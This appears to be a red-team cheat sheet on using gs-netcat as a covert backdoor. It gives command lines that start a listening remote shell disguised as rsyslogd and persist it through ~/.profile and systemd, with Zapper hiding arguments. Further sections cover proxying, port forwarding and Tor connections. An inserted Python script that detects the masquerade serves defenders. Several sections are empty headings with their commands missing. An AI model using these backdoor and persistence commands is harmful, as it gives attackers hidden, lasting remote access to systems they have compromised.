gs-netcat

Overview

The Global Socket Toolkit allows two users behind NAT/firewall to establish a TCP connection with each other, securely.

More on https://www.gsocket.io.

Non-Persistent Backdoor

$(GSOCKET_ARGS="-s MySecret -liqD" HOME=/root TERM=xterm-256color SHELL="/bin/bash" /bin/bash -c "cd $HOME; exec -a rsyslogd /path/to/gs-netcat")

Client Connection

gs-netcat -i -s MySecret
  • The above spawns a full pty, so tab completion, the up arrow and CTRL+C all work

Persisting the Server: .profile

The following line in the user's ~/.profile starts the backdoor (once) when the user logs in. All in one line:

The '( )' brackets start a sub-shell, which is then replaced (by exec) with the gs-netcat process. The process is disguised (as rsyslogd) in the process list.

killall -0 gs-netcat 2>/dev/null || (GSOCKET_ARGS="-s MySecret -liqD" SHELL=/bin/bash exec -a rsyslogd /path/to/gs-netcat)
  • Ensure there are no syntax errors, or the next time a user logs in they will see this message:

ssh [email protected]
[email protected]'s password: 
Last login: Mon Dec 30 19:29:55 2024 from 192.168.15.172
-bash: /root/.profile: line 11: syntax error: unexpected end of file
  • When you are connected to the backdoor, this is how your process will look

  • The above error will occur no matter how you connect to the server
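From the defender's side, the `exec -a rsyslogd` trick leaves two signals: argv[0] no longer matches the binary behind /proc/<pid>/exe, and GSOCKET_ARGS sits in the process environment. The following is an added triage script (not part of this page or the gsocket project) that checks both; the `Proc` record, the `allow` list and the constructed `SAMPLE` are assumptions for illustration.

```python
import os
from dataclasses import dataclass

@dataclass
class Proc:
    pid: int
    argv0: str      # first cmdline entry, what ps/top display
    exe: str        # target of the /proc/<pid>/exe symlink
    environ: dict   # process environment

def masquerade_findings(procs, allow=frozenset()):
    """(pid, reason) pairs for the two signals the technique above leaves behind:
    argv[0] (set with `exec -a NAME`) naming a different binary than /proc/<pid>/exe,
    and GSOCKET_ARGS in the environment (how the secret and listen flags are passed
    off the command line). Names in `allow` are skipped: symlinked shells (sh -> dash)
    and interpreters give benign mismatches, so this is a triage signal, not proof."""
    findings = []
    for p in procs:
        shown = os.path.basename(p.argv0)
        real = os.path.basename(p.exe.removesuffix(" (deleted)"))
        if shown and real and shown != real and shown not in allow:
            findings.append((p.pid, f"argv0 {shown!r} but exe is {p.exe!r}"))
        if "GSOCKET_ARGS" in p.environ:
            findings.append((p.pid, "GSOCKET_ARGS present in environment"))
    return findings

def collect_from_proc():
    """Snapshot live processes from /proc (Linux; root needed for other users' exe/environ)."""
    procs = []
    for name in filter(str.isdigit, os.listdir("/proc")):
        try:
            with open(f"/proc/{name}/cmdline", "rb") as f:
                argv0 = f.read().split(b"\0")[0].decode(errors="replace")
            exe = os.readlink(f"/proc/{name}/exe")
            with open(f"/proc/{name}/environ", "rb") as f:
                pairs = f.read().decode(errors="replace").split("\0")
        except OSError:
            continue  # exited, kernel thread, or permission denied
        procs.append(Proc(int(name), argv0, exe, dict(kv.split("=", 1) for kv in pairs if "=" in kv)))
    return procs

# Constructed sample mirroring the .profile line above: argv[0] reads rsyslogd, the binary is gs-netcat.
SAMPLE = [
    Proc(1234, "rsyslogd", "/path/to/gs-netcat", {"GSOCKET_ARGS": "-s MySecret -liqD"}),
    Proc(1235, "/usr/sbin/rsyslogd", "/usr/sbin/rsyslogd", {"LANG": "C"}),
    Proc(1236, "sh", "/usr/bin/dash", {}),
]

if __name__ == "__main__":
    procs = collect_from_proc() if os.path.isdir("/proc") else SAMPLE
    for pid, reason in masquerade_findings(procs, allow={"sh"}):
        print(pid, reason)
```

On the sample only pid 1234 is reported (once per signal); on a live host, expect a few benign argv0 mismatches that belong in `allow`.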

Persisting the Server: systemd (Not Hidden)

  • Create the secret file

  • Create the service file

  • After it is created

  • This is not great, because the secret file path, or the secret passed with -s, will show up as *********** in the process list

Persisting the Server: systemd (Zapper)

  • Zapper is a great tool for hiding your cmdline options

  • Example service file; in the example below zapper is named keybox and gs-netcat is named crond

  • Make sure it doesn't exist first

  • Quick paste

  • After creating the service file (make sure to alter the key

Command Console

  • If you connect to a listening gs-netcat server with the options below, you will have access to the command console

  • Access it with CTRL+E c; you will see the following

  • This provides file upload and download as well as local commands (e.g. lls, lcd), much like Metasploit

Proxies

Server to act as a SOCKS4/4a/5 server:

Client to listen on TCP port 1080 and forward any new connection to the server's SOCKS server:

TCP port forward: all connections to 192.168.6.7:22

Server:

Client to listen on TCP port 2222 and forward any new connection to the server. The server then forwards the connection to 192.168.6.7:22.

The same using one command:

Tor Client Connection

  • For the best security, always connect to the server via Tor

  • Start Tor in one window
